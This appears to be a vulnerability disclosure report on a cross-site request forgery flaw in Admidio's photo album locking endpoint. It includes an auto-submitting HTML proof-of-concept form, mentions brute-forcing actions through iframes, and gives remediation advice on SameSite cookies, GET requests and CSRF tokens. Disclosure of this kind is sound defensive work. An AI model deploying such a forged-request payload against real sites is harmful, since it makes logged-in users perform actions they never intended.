Cross-Site Request Forgery (CSRF) in admidio/admidio
Aug 17th 2021
Attacker able to unlock/lock any album with CSRF attack.
It does not matter at all that your application run in localhost or elsewhere, just it is enough to run on a browser and another low privilege user or attackers know the IP address or hostname of your application.
In CSRF attacks it is necessary that a user logged into your application and just going to a malicious website and after that only with a redirection attacker can perform attack on unprotected endpoint, this means only with visiting a site a unwanted action will be perform without that user aware from that.
🕵️♂️ Proof of Concept
1.fisrt admin already should be logged in Browser.
2.Open the PoC.html (it is auto-submit).
3.Here a album with pho_id
2 will be locked after the PoC.html file opened.
<html> <body> <script>history.pushState('', '', '/')</script> <form action="http://localhost:8000/admidio/adm_program/modules/photos/photo_album_function.php"> <input type="hidden" name="pho_id" value="2" /> <input type="hidden" name="mode" value="lock" /> <input type="submit" value="Submit request" /> </form> <script> document.forms.submit(); </script> </body> </html>
This PoC can perform attack without that users noticed and Also PoC can send multiple request at same time that means attacker can Bruteforce all possible actions ( with using multiple Iframes )
This vulnerability is capable of had a high impact on availability of any album.
The easiest way that you set
strict attribute on each cookie, Or you set
Lax and Use
GET requests only for receiving data not changing them.
The best way is that you set a CSRF token in each endpoint.
📍 Location index.php#L1